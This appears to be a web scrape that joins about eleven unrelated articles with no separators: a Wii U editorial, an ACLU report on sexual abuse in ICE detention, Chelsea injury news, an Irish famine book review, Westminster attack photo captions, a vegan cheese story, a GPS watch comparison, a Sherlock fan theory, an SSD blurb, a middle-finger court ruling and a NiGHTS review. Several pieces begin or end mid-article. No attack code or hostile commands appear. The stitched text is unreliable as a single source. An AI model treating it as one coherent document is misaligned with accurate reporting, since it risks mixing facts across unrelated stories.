It can be a frustrating scenario for Nintendo fans, especially those that may have fantasised in optimistic pre-launch 2012 days of a Nintendo system that would deliver first-party and attractive multi-platform experiences. As it is, gamers that seek a broad experience and a lot of major triple A game have to contemplate other means, with PC, Sony and Microsoft each offering options. The Wii U is becoming — perhaps already is — a system for Nintendo games, occasional if exciting exclusives, and a potentially prosperous download market. The question is whether that's a particular surprise or, even, an issue.
For those that can only afford to own a Wii U, it is a problem. It's the Wii all over again, with the bulk of third-party multi-platform games duking it out on Sony and Microsoft platforms, though Nintendo's last-gen box of tricks did have a diverse and fairly attractive range of exclusives from out-with Nintendo's legendary studios. The reason that Ubisoft and others dabbled with exclusives was because it was worth a punt, due to the Wii userbase being impressively broad; taking a gamble is relative when tens of millions of units — now over 100 million — are out in the wild. So with the inevitable shovelware and nonsense we did have some solid titles such as Red Steel 2 and Silent Hill: Shattered Memories (the latter also on PS2 and PSP, admittedly) that came from third-parties keen to give the Wii a whirl. As we've already suggested above, with the Wii U Nintendo is having to provide incentive to studios to bring their games to the console — money on the table, we'd wager, in most or all cases.
As we've suggested in the past, it's not new for Nintendo to be outside of the triple A club in third-party multi-platform games, and it's been argued here in the Nintendo Life office that this has been the case since the Nintendo 64. Once Nintendo went its own way in terms of its technology and interfaces, and also struggled with the GameCube, support from major publishers has fluctuated depending on a system's performance, and always with that awkward perception — which is pretty accurate — that Nintendo games sell most on its hardware while the rest fight over scraps. The NES and Super NES days of Nintendo being the go-to hardware manufacturer are long gone.
The reason the Watch_Dogs revelation matters is because it should, we'd anticipate, wipe out any remaining pretence that the Wii U will deliver a viable platform to enjoy the bulk of high-budget multi-platform games. That ship sailed before now, but the Ubisoft title was a remaining gleam of light, an example of console parity for Wii U owners that'd rather get their fixes through just one system. Of course, it's possible to only own a Wii U and have a variety of games to play — it's a Nintendo box with big N goodies — but it's a reality that indulging in the best-selling offerings from other publishers is becoming something for other systems. For Nintendo gamers with a taste for ever-increasing diversity, owning more than one home console — or a PC — is once again a necessity.
None of this is to say Nintendo doesn't need third-party support, of course it does, yet it needs that support to relate to the audience that the Wii U forges, so may take the form of those family-friendly, accessible games that arrived on Wii. Should the latest system successfully revive its fortunes through its various big-name titles that are coming in 2014, then more games from other developers will follow — it's not an instant or immediate fix, however, and studios that work on the biggest franchises to flood Sony and Microsoft systems are becoming another generation removed from Nintendo, stripping away familiarity with the hardware and, by extension, increasing the investment needed to produce games for the platform.
So Watch_Dogs isn't the big-name IP to show the Wii U can mix it with its contemporaries for mainstream, triple A project. The Wii U is pushing ahead on its own path, just like the Wii before it. Its long term prospects are unclear as yet, but we need no more hints, delays or cancellations to tell us one thing.
The Wii U is a system for exclusive, different experiences mostly from Nintendo and, in some instances, from allies, partners and third-parties. It won't deliver all of the multi-platform blockbusters with enormous marketing budgets — it just won't.
Civil rights lawyers have uncovered evidence of widespread sexual abuse of detainees at immigration detention facilities across America in what they say is the systemic violation of a particularly vulnerable population.
The American Civil Liberties Union has discovered details of 185 official complaints of sexual abuse that have been made against the main immigration authority in the US, Immigration and Customs Enforcement (ICE) since 2007. The ACLU, which obtained the details through freedom of information requests, believes that is just the tip of the iceberg.
Most of the complaints involve allegations of abusive sexual advances made by male detention officers against female detainees. What struck ACLU researchers was that the claims were not focused on a few rogue facilities or isolated cases, but showed a pattern of problems that extended right across the country.
"The evidence points to a systemic problem," said David Shapiro, an ACLU lawyer in its national prison project. "The sheer fact that the allegations are so widespread is cause for alarm."
Shapiro added: "Just one case of sexual abuse is intolerable – there should be zero tolerance of it – but our findings show this goes far beyond that."
A map compiled by the organisation from its findings shows that 22 of the 50 states in the union have had allegations of abuse lodged against them, with California, Arizona and Texas standing out in the numerical league table.
Texas in particular has faced a heavy weight of accusations, with 56 complaints lodged against it. That is in part explained by the concentration of detention facilities in the state, though civil rights lawyers say that the striking number of allegations arising in Texas bears further investigation.
Three of the most egregious cases to have emerged in recent years all occurred in Texas, at the Don Hutto Family Residential Center. The facility is run on behalf of ICE by America's largest private prison company, Corrections Corporation of America.
The ACLU in Texas on Wednesday issued a civil lawsuit against the company and ICE officials on behalf of three women who were sexually assaulted while in custody at Hutto having appealed for asylum in the US.
The women were all abused by Donald Dunn, a guard at Hutto who has pleaded guilty to five counts of official oppression and unlawful restraint involving assaults on five women prisoners. He is also facing sentencing on other criminal civil rights violations.
Court papers lodged in the ACLU action give details of what happened to the three women, whose full identities are being withheld to protect their safety.
"Raquel" was arrested by immigration officers as she tried to cross the Mexico border, having faced death threats in her native central American country after her husband was murdered. She was transferred to Hutto, and while her application for asylum was being processed she was allowed out on bail.
But she was attacked by Dunn while he was transporting her to the airport upon her release, as she relates in the court documents: "I thought he was going to kill me. I thought I should have stayed in my home country if my life was going to end like this, because at least I would have had more time with my children. I kept yelling, I was crying."
The number of undocumented immigrants who have been arrested in the US and put into detention facilities pending deportation has increased dramatically in recent years. President Bush introduced the Secure Communities scheme shortly before he left the White House, and it was then extended under the Obama administration, to the disappointment of many civil rights campaigners who see it as a form of harassment of immigrant groups.
As a result, detention of immigrants has become something of a boom industry in America, with 250 facilities now operating across the country where more than 30,000 detainees are held at any one time, more than 60% of whom were of Mexican origin.
The documents released to ACLU under freedom of information are heavily redacted, but give an insight into the kind of abuse complaints that are regularly being raised. One complaint alleged that they were made to strip naked in front of two other individuals while at a detention centre in Orange County, California. "It was also alleged that the complainant was laughed at mockingly in an intimidating fashion."
Other complaints ranged from inappropriate touching to forceful fondling and rape.
Chelsea are waiting to assess the severity of a hamstring injury sustained by N'Golo Kanté in France's World Cup qualifying win in Bulgaria on Saturday but expect to be without the midfielder and Álvaro Morata for the trip to Crystal Palace on Saturday.
Kanté hobbled off in the 34th minute of the game in Sofia, which France won 1-0, and was withdrawn from Didier Deschamps's squad for Tuesday's final group game against Belarus. The midfielder, who has been nominated in France Football's 30 contenders to win this year's Ballon d'Or, hurt the hamstring in his left leg but has yet to return to Cobham, where he will assess by Chelsea's medical staff.
Chelsea optimistic Álvaro Morata injury is not as severe as Spain fear Read more
Kanté would not expect to feature on Saturday and, with Tiémoué Bakayoko and Cesc Fàbregas fit, his absence could be tempered further by Danny Drinkwater's return from a calf complaint which has prevented him making his debut for the champions following his £35m move from Leicester City.
Chelsea have been encouraged by their assessments of the hamstring discomfort Morata experienced in the first half of the home defeat by Manchester City before the international window. The Spanish football federation initially suggested he would be absent for up to six weeks after its scans, conducted in Madrid, revealed a grade-two hamstring injury.
Yet Chelsea's medics have carried out tests and do not believe the injury is as serious as first feared. Although Morata is expected to sit out the game at the bottom-placed Palace, there are hopes he could feature at home against Roma in their Champions League group game next week.
Chelsea top Group C after impressive victories against Qarabag and, most signficantly, Atlético Madrid where Morata scored their first goal. Antonio Conte is expected to select Michy Batshuayi – who scored the winner as a substitute at the Wanda Metropolitano – in Morata's place at Selhurst Park, where Ruben Loftus-Cheek will be ineligible for the hosts. The England under-21 midfielder is on a season-long loan at Palace.
A detail from the cover of "The Graves are Walking" "The Graves Are Walking": Was the Great Potato Famine a genocide? A new book argues that free-market ideology, not murderous intent, killed Ireland's millions
Narrative history is a tricky business, fitting all those recalcitrant facts into the form of communication human beings love best. A good narrative needs a protagonist -- the answer to that shrewd editor's question, "Whose story is this?" -- but it needs an antagonist as well. A villain makes things easy; one of the reasons World War II history remains so popular is that it has an archvillain in Hitler, a genuinely bad person pursuing a wicked agenda justifying himself with evil ideas and attitudes. But the antagonist can also be time, society, change -- even the weather.
So what sort of story is the great Irish potato famine of the late 1840s, a catastrophe that killed a million people, drove over a million more from their homeland and permanently transformed the way the Irish people view themselves? It's a tragedy, obviously, but does it feature an antagonist comparable to Nazi Germany, as some Irish historians have claimed? Or, to use modern geopolitical terminology, was the Great Famine a form of genocide? Calling it that gives the carnage a label commensurate with the trauma Ireland suffered, but history, like justice, seeks more than just emotional truths.
Advertisement:
John Kelly, author of the new book "The Graves Are Walking: The Great Famine and the Saga of the Irish People," does not think the famine constituted genocide. Citing an Irish nationalist author who accused Britain's Assistant Treasury Secretary Charles Trevelyan of infecting Irish children with a special "typhus poison" in a government laboratory, he writes that the man "should have stuck to the truth. It was incriminating enough." The story Kelly tells in "The Graves are Walking" is indeed damning, a shameful, bloody blot -- and far from the only one -- on the history of the British Empire. But calling it a genocide, however satisfying that pitch of moral condemnation may be, only acts to obscure the chilling contemporary relevance of Ireland's 19th-century agony.
Kelly, whose previous book, "The Great Mortality," offered an account of the plagues that devastated Europe in the Middle Ages, recounts the progress of the famine chronologically. It began with a mysterious blight that struck the potato crops of Flanders in 1845. The blight, which scientists of the time mistakenly believed to be caused (rather than merely fostered) by damp weather, was a fungus that could destroy a field of plants overnights and turn seemingly healthy potatoes into black, slimy lumps. The blight afflicted England and Scotland as well as Northern Europe, but its effect on Ireland was particularly dire because the economy there was entirely dependent on the labor of peasants whose compensation consisted of permission to cultivate small parcels of land. Potatoes, which grow quickly and are highly nutritious, were the only crop with a high-enough yield per square foot to feed them.
The colonial nature of the Irish economy exacerbated the food shortage. Most of the landowners were Anglo-Irish, and many of these were absentee landlords who really identified as English. (The Duke of Wellington, born in Dublin, reputedly responded to someone who called him Irish by saying, "Being born in a stable does not make one a horse.") They visited their Irish properties infrequently (or never) and regarded them solely as a source of funding for a lifestyle that, as Kelly puts it, showed "a preference for conspicuous consumption over agricultural investment." Whatever the faults of England's own class system, the landed gentry were seen to have a paternalistic obligation to care for their tenants, especially in times of need.
The political, economic and humanitarian failure of England's response to the famine amounted to -- no joke intended -- a game of hot potato between the British government and Irish landowners over who was responsible for aiding the poor. The now archetypal tableau of Irish grain being loaded onto ships bound for England as Ireland's starving masses watched speaks of the landowners' indifference to anything but their own income. The refusal of the British government to act decisively to stem the crisis early on arose from its determination to make Ireland "independent" (if only there were a way to make those scare quotes extra ironic). Both sides were ignorant and shortsighted, confident in their stereotypical notion of the irresponsible, fanciful and lazy "Irish character" but oblivious to all the ways that rural subsistence economies cannot be expected to start functioning like England's more developed agricultural one overnight.
Kelly, like most historians, places the brunt of the responsibility for this fiasco on the shoulders of Trevelyan. As the policy leader of the famine response program, Trevelyan was not a Mengele-style mad scientist but a civil servant known for his "unbending moral rectitude and personal intensity." Unfortunately for the Irish, the faith he embraced was a fusion of Moralism, "an evangelical sect that preached a passionate gospel of self-help" and the laissez-faire economics of Adam Smith and Edmund Burke. At several key points in the evolution of the catastrophe, when strategic intervention might have fended off thousands of deaths, Trevelyan refused, maintaining that there was no greater evil than interfering with market forces. When a subordinate protested, he would send him a copy of Burke's "Thoughts and Details on Scarcity."
The Irish economy was backward and precarious, but for Trevelyan the failure of the potato crop presented not a life-or-death crisis but an opportunity to forcibly modernize it. He agreed to a limited public works program (in which out-of-work laborers were paid a pittance to build roads to nowhere) because he believed it would break the peasant class of its reliance on barter and subsistence farming. The idea was to sell them corn imported from overseas because the grain couldn't be cultivated in Ireland, thereby accustoming them to using money. However, when Ireland's mercantile men objected to the price-depressing effects of government-funded grain, Trevelyan vowed not to sell it too cheaply, claiming that high prices would promote foreign imports.
Advertisement:
These strategies amount to the 19th-century version of what Naomi Klein has dubbed the "Shock Doctrine": an attempt to force economic reforms on a population reeling in the aftermath of a disaster. Kelly intersperses the nitty gritty of the shifting Irish economic situation with horrific glimpses of its human toll: streets jammed with gaunt, half-naked wraiths who had sold their clothes for food, families gathered mutely in miserable cottages to die, unburied corpses by the roadside, entire hamlets razed by landlords seeking to evict "dead weight" tenants they'd otherwise have to help. If only these unfortunates could have sought comfort in "Thoughts and Details on Scarcity"!
Recognizing that the British handling of the famine was "parsimonious, short-sighted, grotesquely twisted by religion and ideology" rather than deliberately genocidal is important because while powerful, paranoid, racist madmen like Hitler are relatively rare, our own time is replete with men like Trevelyan. The Moralists saw the famine as a combination of divine judgement on the Irish people and the market working itself out in accordance with God's plan, an equation of brutal capitalism with pseudo-Christian piety that can be just as destructive as outright malevolence. That version of the story may not be as satisfying dramatically and morally as the one with the evil, homicidal Englishman, but it does do what history does best, which is to show us how not to repeat it.
A car is seen crashed into a fence outside the Parliament building in London on Wednesday, March 22. Police have launched a "full counter-terrorism investigation" after an attacker rammed a car into crowds of people and stabbed a police officer on Parliament grounds.
An armed police officer stands over the attacker, identified as Khalid Masood, outside Parliament. "It appeared that a car was coming towards the House of Commons mowing down pedestrians on the way," Member of Parliament Gerald Howarth told CNN. "The driver then got access to the parliamentary estate, stabbed a police officer and was shot."
An armed police officer stands over the attacker, identified as Khalid Masood, outside Parliament. "It appeared that a car was coming towards the House of Commons mowing down pedestrians on the way," Member of Parliament Gerald Howarth told CNN. "The driver then got access to the parliamentary estate, stabbed a police officer and was shot."
Photos: Deadly attack outside UK Parliament
Masood is treated by emergency services as police look on at the scene outside the Houses of Parliament. The Metropolitan Police say he was born in Kent, but is believed to have been living in the West Midlands recently. Police say Masood was also known by a number of aliases. "Masood was not the subject of any current investigations and there was no prior intelligence about his intent to mount a terrorist attack," Met Police said in a statement.
ES News Email Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account. Please log in or register with your social account
Vegan cheese has been universally renamed ‘Gary' after Sainsbury's turned one cheese-lover's furious tirade into a viral joke.
The supermarket was the subject of a tremendous Facebook rant after a woman kicked off at the branding of dairy-free vegan products as ‘cheese'.
Instead, she said: "Call it Gary or something just don't call it cheese because it's not cheese!"
But the vegan community responded in style, and within hours social media was flooded with jokes and memes, particularly on the new 'It's not Vegan Cheese, it's Gary' Facebook page.
Then the supermarket itself got in on the act, posting an altered image of its dairy-free cheese with the name changed to “Gary”.
It added the caption: "Thanks to customer feedback, we're excited to introduce our new range of #Gary." The post has been shared over 4,000 times and sparked a flurry of similar efforts.
It comes after the supermarket released its new range of seven £2.25 coconut oil-based cheeses last week, which include alternatives to cheddar and wensleydale with cranberries.
The firm behind the products – Bute Island Foods – also saw the funny side, posting a photo of member of staff called Gary holding up a pack of the dairy-free cheese with a ‘Gary' label.
I just got home from Boston after running the weekend races. I took my trusty FR620, FR920XT, Fenix3 and SirfSTAR GPS logger with me and bought a TomTom Runner at the expo just to get one more data point for the comparison run that was not Garmin. My hypothesis before the running was that the Fenix 3 would do great with Boston given it's relatively straight line running course with very few turns and it would do better than most watches in downtown thanks to Glonass. I also suspected that the FR920XT would probably do just as good if not better. So how did they do?
I ran both the 5K then two days later the marathon. The 5K is strictly in downtown with heavy building cover and runs the last mile of the marathon course under these tough conditions.
The 5K weather was perfect, clear skies, full sun, as good as it gets for a race and for GPS. The marathon was full overcast with moderate to heavy rain throughout the race with stiff headwind, basically the worst you can have for a race or GPS or pretty close to it. It turned out pretty good to have both of those conditions as far as GPS reception goes as it really tells a better story. Please ignore my times and the horrible positive split in the marathon, given that I ran a total of 100 miles in the last 3 months with the longest run being a 10 miler due to injury has something to do with it. But let's look at the data...
Here are the distance differences relative to the FR920XT which I used as reference:
LoggerFR620Fenix3
You can see that the Fenix 3 measured the shortest while the logger measured the longest which is no surprise, this has been the case in all my testing so far. What you can see is how the Fenix 3 cut off the turnaround on Commonwealth while the other units did way better on that turn. The underpass did not pose a huge challenge to any of the units. The turn to Hereford looks pretty decent on all units even if the Fenix 3 and the FR620 were offset form the other two. Once on Boylston the story changed and you can see that GLONASS really came through and made the Fenix 3 and the FR920XT shine. Overall I think these tracks look great and as good as anyone could expect from these units, the only caveat being that it seems like the Fenix 3 has to resort to heavy filtering to achieve this look which ends up costing in turns.
Here are the distance differences relative to the FR920XT which I used as reference:
LoggerFR620Fenix3TomTom Runner
The logger measured way longer than anything else and it also seems to have lost its marbles at the 2 hour mark for about 7 minutes where I see no real reason for it. The logger was in a front pocket of my running shorts and it very well could have had something to do with my shorts being soaked from the rain by this point but it picked up and recovered after the incident.
If we zoom in and take the Logger's data out of the view then you can see that the rest of the units tracked close, within 500 ft of each other for the entire race with TomTom measuring the shortest, The FR920 the second shortest, then the Fenix 3 and finally the FR620. This is kind of what I expected since there were no turns for the Fenix to lose distance over the FR920 and I still thin kthe 920 is more accurate for distances. The TomTom's measurements while shorter than any of the others seem to be the closest to the actual distance and the track looks really good. Mind you, this is all in full overcast and pouring rain for the most part.
LoggerFR620Fenix3TomTom Runner
Things are looking good overall until we get past the Newton Hills and start rolling down past the cemetery where the Fenix 3 decided to take a detour thanks to multipath and some taller buildings on the right side. Once we got to Fenway Park the situation for most units became too much to bear and things got ugly. I'm actually quite shocked just how ugly they got. Boylston street was a disaster for pretty much all "GPS participants" in this race and the Fenix 3 fared just as bad as an FR620 without GLONASS. The FR920XT hanged on for dear life and did the best it could in the conditions and the TomTom unit really put on a valiant effort when compared to the abysmal performance of the GPS logger, the Fenix 3 and the FR620.
Even with all these route distractions the distance measured by the Fenix 3 on the watch were not bad, it claimed that I ran 26.38 miles while the FR920XT said it was 26.35 miles both of which are as close as anyone can get on a marathon. The TomTom said it was 26.42 miles while the FR620 reported 26.47 miles during the run. I prefer to concentrate on these numbers rather than the re-calculated numbers by mygpsfiles or SportTracks as those are not the ones I run/pace off of.
In SportTracks the distances were:
Watch Distance Difference TomTom 26.42 matched the watch reported distance FR920XT 26.52 0.17 longer Fenix3 26.68 0.3 longer FR620 26.78 0.31 longer
Conclusion
From last weekends running you can see that weather conditions can have a tremendous effect on GPS reception quality, especially when the GPS reception is already compromised by tall buildings or tree cover.
The Fenix 3 filtering is still the same (ran with the FW3.2 for the marathon, FW3.1 for the 5K) and it tries to help with the sub-par quality of the GPS track that it might produce otherwise.
A $100 TomTom without GLONASS performed almost as good as the FR920XT for the run and is definitely better than the Fenix 3. If you're the kind of guy who'd like to see the same number being calculated everywhere then TomTom is the watch for you as it was the only contender that matched its in-run distance with the post-run distance.
I think the FR920XT is still the king of Garmin watches and I'm definitely not ready to sell it just yet. The Fenix 3 has a long way to go to catch up to the FR920XT.
However a log from a friend of mine who ran a much better Boston than I did on Monday with the Fenix 3 both GPS and time wise so it can very well be a large variance between unit to unit on the Fenix 3. This is his second Fenix 3, the first one he returned because it was measuring short on his tree covered city park route and the new one's serial number was only a hundred or so different from the old one. This would also explain why some people report absolutely zero problems while others report serious problems. However on his run it seems like the ANT+ stack died 2 hours 11 minutes into his run as his cadence measurements took a serious change (switched off of HR+RUN) and his temperature rose (switched from Tempe to internal) and his HR data went away.
Speaking of Temperature, my Tempe stayed connected the whole way and I did lose it only a handful of times in the entire run. I think it should be an easy task to filter out these spikes from the log via a firmware update and I also think it is absolutely necessary for Garmin to do so as the spikes are annoying but not as annoying as the huge variance between the two Fenix 3 tracks I just posted which is the most concerning problem of all.
Original files: https://dl.dropboxusercontent.com/u/...Boston2015.zip
Another thing that also happened is that according to my Fenix 3 I set 8 new records on this run, one of them being the fastest mile in 0:00 (yes, zero zero) and the fastest 5K in 15:56 as well as 40:53 10K and 1:33 half, none if which were part of this run. So there is something seriously screwed up there too.
I wonder if the fact that I used a course navigation during this run had anything to do with any of these things, including the massive disparity between my GPS track and my friend's and the disparity between the log quality of Saturday's 5K and the marathon. Now that I looked at the track closer it almost looks like that GLONASS did not work even though I had it set to be on.
Read more Garmin Fenix 3 reviews on Amazon.com
Something's up with The Six Thatchers. This was a blog post and case back in 2012 yet no one in the episode remembers that. Also the episode was trippy AF but what does that all mean? We have a lot of guesses, and I've just thought of one more, one I'm actually quite convinced of. It combines our “extended mind palace” idea with the Mycroft's concept of “the unreliable narrator”. So here's the thing: Sherlock met Ella at the end of The Six Thatchers but he recalls events from his life from before he shot Magnussen in His Last Vow, when John's life/happiness was threatened and Sherlock had to give up everything to save him. Everything we've seen since Mary shot him has been a recount of events from Sherlock's point of view, even placing himself in scenes he wasn't actually in. This is why we see characters repeat lines other characters have said, even though they were never there to hear them. Sherlock's recounting, throwing cases in where they don't belong to fill in the gaps. Meaning the events immediately after Sherlock got shot by Mary are him recounting the situation to Ella and we wouldn't know that until right now.
So here's the timeline:
–Mary Shoots Sherlock
–Sherlock goes to the hospital and stays there for a long time to recover
–Sherlock is not part of Mary's reveal in the way we saw (Him scaling the hospital wall, moving John's chair, setting up the I.V., the perfume, and rigging a projector was just him adding a touch of drama to embellish the story as he tells Ella ****this happens a lot, keep in mind*****)
–John doesn't let Sherlock read the AGRA drive (so he assumes John hasn't read it either, that would be the only reason to keep it from Sherlock)
–Sherlock calls Magnussen and makes a deal with him (Sherlock does not go to a restaurant in a hospital gown ***again, this is a touch of the dramatic for Ella's benefit***)
–John chooses Mary for reasons we do not know (Sherlock assumes it's because of sentiment, but he wasn't actually part of that scene so he's simply guessing how it probably played out – he made sure to never have them use the words “I love you” because that would've hurt too much. Weird how Mary was at Sherlock's mom's house for Christmas? Yeah. She probably wasn't there. But John and Mary reconciled that day, so Sherlock inserts that in his sphere. This happens more than once.)
–Sherlock kills Magnussen
–Sherlock gets high because he's lost John Watson again (just like at the end of TSOT)
–Sherlock gives himself a Casablanca-type send off in order to tell John how he feels. Dramatic Bastard. Keep in mind he's high as a kite, not on the tarmac, but hoping he could experience that movie moment with his leading man. This is why John doesn't say much there or on that plane during TAB. The coke dream started after he shot Magnussen and envelopes all TAB, but he tells Ella as if it's real.
–Mycroft doctors the footage, Sherlock never in danger of going to Eastern Europe because the tarmac/TAB wasn't actually real. He's still high at the beginning of TST, obviously. This is him coming down from the coke he took shortly after he killed Magnussen.
–Sherlock is too absorbed in his phone (heart) to pay John and his new family any attention. He ignores John's texts. He makes John feel like he's equal to a balloon and a dog. He demands John take the bus.
–John, hurt, finds fleeting pleasure in a strange woman (This is what Sherlock thinks, at least. He's seen all the signs. John losing weight, changing his hair, dressing nice, spending time away from both him and Mary – what else is Sherlock to think? What else are we to think? Keep reading and I'll tell you).
–The Six Thatchers case isn't happening in real time – it happened years ago but Sherlock kept the best parts in order to better relay what's happening with the AGRA stick. In the blog post, the murder weapon was a penknife with initials on it, shoved in a Thatcher bust. The mirror here is clear. All that we need to take from this is Mary's past has come back to haunt her.
–Mary leaves John to go to Morocco. John follows – Without Sherlock. John catches her and brings her back to London. Didn't it feel weird when John and Mary were having a really intimate moment and Sherlock was just… sitting there absorbing it all? That's because he wasn't there, this is how he assumed things went in Morocco. Which means he wasn't on that plane sitting awkwardly behind Mary and far from John. We see Sherlock with his eyes closed, sleeping. That's also when he sees John thinking of the other woman. Sherlock tells Ella he has a reoccurring dream about John – he's dreaming about what he fears John is most-likely absorbed in: finding fleeting happiness in yet another woman.
–Mary's death scene is being recounted from Sherlock's POV, meaning real events are very similar, but off. Sherlock believes Mary took a bullet for him, apologized, and John wept for the love of his life. Just because we saw it doesn't mean it's real. Just because Sherlock believes she's dead doesn't mean she actually is. Trust nothing.
This theory explains why Mary calls Sherlock the Dragon-slayer, something Mycroft said. It explains why The Six Thatchers was a case twice. It explains why Norbury quoted Moriarty from TGG. It explains why Sherlock is so hung up on premonitions: John and Mary in TST followed exactly what Sherlock dreamt about with the Carmichaels in TAB.
So. That was long! But all of this has one question dangling in the air: What's actually been going on with John this whole time? If he reconciled with Mary, follows her abroad, is spending time away from his family, and is in cahoots with a woman he met on the bus, it would point to John becoming a plant/agent himself working behind Sherlock's back to destroy an invisible threat. This is why the end of The Six Thatchers mirrors the end of The Reichenbach Fall – except the characters are switched. John pushed Sherlock away, lied to him, left him a note, and distanced himself. Sherlock goes to the therapist and grows the facial hair.
The woman on the bus sits right next to a poster of Culverton Smith. Many have suggested she's actually a part of something far larger than we can see yet.
The last thing I'll leave you with, and correct me if I'm wrong, but didn't Setlock show Martin Freeman filming on a camel? Alone? Why would he be the only one on the camel if both he and Sherlock went to Morocco?
That's because Sherlock didn't follow him to Morocco when he tracked down Mary. Sherlock inserted himself somewhere to better tell us the story.
This is part of their rug pull coming up. The unsettling nature of The Six Thatchers is meant to make us ask questions about what we can and cannot trust with our own eyes. Is it a bluff? Or a double bluff? Is he alive or is he dead? How could he be alive if I saw the blood on the roof? How could he be alive if I saw him fall?
The writers are giving us the same doubt felt by the characters.
Welcome to Hell.
@tjlcisthenewsexy @ebaeschnbliah @gosherlocked @skulls-and-tea @inevitably-johnlocked @loudest-subtext-in-tv @monikakrasnorada @longsnowsmoon5 @usny
The SanDisk Z400s is a cost effective SSD designed to replace HDDs in SATA SAS PCIe
computing platforms. On par with HDD pricing, it can outperform HDDs
by a factor of 20, while providing 5 times the reliability at 1/20th the power
consumption.
The Z400s has also been validated for use in several of the top OEM platforms in the industry, demonstrating
its endurance and ability to sustain high-volume transactions. Its solid-state design means there are no moving
parts, making it shock-resistant and much more reliable than traditional HDDs, which translates into lower
total cost of ownership (TCO) and a better end-user experience.
The Z400s utilizes breakthrough SanDisk technology that optimizes power consumption, making it one of the lowest power consuming SSDs at 30mW for average power. This increases the amount of usable hours per battery charge, which is essential for modern mobile devices.
SanDisk SSDs are more reliable than HDDs, which can improve total cost of ownership (TCO) by reducing downtime due to hard drive failures. They also offer lower latency and greater read/write speeds over traditional HDDs*, so users may experience a noticeable improvement in responsiveness. IT departments can extend the useful life of their PC inventory by upgrading the HDDs to the Z400s SSD, thus prolonging replacement cycles and maximizing asset value.
This stock photography model can feel free to roll down his window and display a middle finger, especially in Pennsylvania. Carlos_bcn/Getty
A Pennsylvania appeals court has overturned the disorderly conduct conviction of a man who gave his ex-wife the middle finger.
The gesture was not obscene, which would allow it to be criminalized consistent with the First Amendment, a three-judge panel found.
Jason Waugaman allegedly made the gesture after dropping off his two children in 2014. His ex-wife told police he extended the finger as he peeled out of a parking lot.
Though acquitted of reckless endangerment tied to his driving, Judge Anthony Mariani convicted him of disorderly conduct by making an obscene gesture, as his kids “may well have seen their father's conduct in relation to their mother as explicitly sexual.”
All three Pennsylvania Superior Court appeals judges agreed this week with overturning the conviction, which the Allegheny County District Attorney's Office did not defend.
“Although appellant's display of his middle finger was offensive, insulting and disrespectful, the commonwealth is constrained to agree with him that it does not meet the criteria of an obscene gesture as defined by the statute and case law,” prosecutors said in a July filing.
The appeals judges said an average person – rather than the children, specifically – would have to find conduct obscene for it to be legally considered so. In a 2000 ruling, the same court found it was not obscene when a driver said "f--k you" and gave the middle finger to a state employee.
One of the judges reviewing Waugaman's conviction offered a single sentence of analysis in a concurring opinion, writing: “Unless the First Amendment was repealed when I was not looking, giving someone the finger should not constitute a crime.”
Indeed, the outcome of middle-finger cases is familiar.
American University law professor Ira Robbins says many people have been charged with disorderly conduct under similar circumstances, but that the charges either are dismissed or are overturned on appeal.
“The middle finger these days, unlike 50 years ago, is not considered obscene. It's more an expression of anger or frustration," Robbins says.
Robbins authored a lengthy paper on middle-finger cases, and says that although it's conceivable a state judicial system would find the gesture obscene under subjective local standards, such a decision almost certainly would be reversed by the U.S. Supreme Court.
The justices likely would find local prohibitions too vague, or that middle-finger exhibitions do not meet the three-prong test for obscenity set out in Miller v. California, Robbins says.
In that 1973 decision, the Supreme Court said obscenity equates to something that appeals to the prurient interest in sex, conveys sexual conduct in an offensive way and lacks "serious literary, artistic, political or scientific value."
It's unclear if Waugaman ultimately will sue local prosecutors or the Hampton Township Police Department over the case, which yielded an initial penalty of 90 days' probation.
A fellow Pittsburgh-area resident, David Hackbart, won a $50,000 settlement in 2009 after a federal judge ruled police violated his First Amendment rights by giving him a disorderly conduct citation for showing a middle finger to a fellow driver and a policeman.
Waugaman was represented on appeal by the Allegheny County Public Defender's Office, which did not immediately respond to a request for comment.
Robbins says that although he and many judges believe there's a constitutional right to give someone a middle finger, uttering threats would be a crime, and that the crass sign still could bear consequences.
A thin-skinned policeman can still arrest you and force an inconvenient path to vindication, he says. Or a fellow driver could be armed with a weapon or swerve in spite, causing an accident.
“There's a right to do it, but it's not necessarily the smartest thing,” he says.
Watch: A 2010 Comedy Central report on another case:
In 1996, Microsoft had nothing resembling a games console, Nintendo was still using cartridges, and SEGA was getting its butt kicked by upstart Sony and its PlayStation console. Needing a 3-D title that would show its Saturn console could compete, SEGA's Sonic Team produced NiGHTS into dreams…. This concept platform game allowed players to fly smoothly through levels with previously unseen fluidity. It even came bundled with an analog controller, since the traditional digital d-pad didn't do it justice. While it didn't save the console, it did capture the hearts of many gamers.
About four and a half years ago, SEGA's China studio ported NiGHTS to the PlayStation 2. That version of the game was Japanese exclusive, but it now forms the basis for the current-generation remake. Rather than port the original Saturn game to the Xbox 360, SEGA opted to bring over the PS2 version. This was likely done for technical reasons, given the architecture differences between the Saturn and current-generation consoles, but in doing so, some of the magic was lost. Specifically, the buttery smooth control is no more.
More than any other game, NiGHTS was built around the Saturn analog controller. It could function in digital mode and was playable, but it didn't really shine until you plugged in the analog controller. With a full 360 degrees of movement, racing through a level was akin to a finely honed ballet. A small nudge of the controller is all that was needed to adjust your path, and performing loops was as simple as making a circle with your thumb. Unfortunately, the port appears to be stuck firmly in digital mode.
The Xbox 360 version of NiGHTS allows you to use the analog stick, but the game doesn't appear to treat it as an analog control. Instead, it seems to be recognizing the analog stick as an eight-way joystick. As a result, movement has a subtle jerkiness to it. Small adjustments can sometimes result in major movements on screen, and loops are often more like ovals than circles.
To ensure the effect wasn't simply one of rose-colored glasses, we hooked up the Saturn and fired up an original copy of NiGHTS. Doing an A/B test between the two was night and day. Although the Saturn version was lower resolution, on-screen movement was noticeably smoother when in analog mode. Playing on the Xbox 360 was like playing the Saturn version with a digital controller. It's not quite the same game.
Aside from the control limitations, most of the original game content appears to be here. The CGI movies are presented in a higher resolution than the original, and the sound is intact. All seven worlds are here, with three unique to Claris and three specific to Elliot. The final world is shared between the two. You must master the first three levels of each character before the final world is made available.
Because NiGHTS comes from an era before games were heavy on story, fighting the bosses is going to be something of a blank slate if you're a new player. Unlike modern games, NiGHTS doesn't tell you what you're supposed to do. Instead, it just throws you into the fray and expects you to figure it out. If you fail, the game displays a tip on how to defeat the boss, but it doesn't just let you try again. Dying during a boss fight means restarting a world from the very beginning.
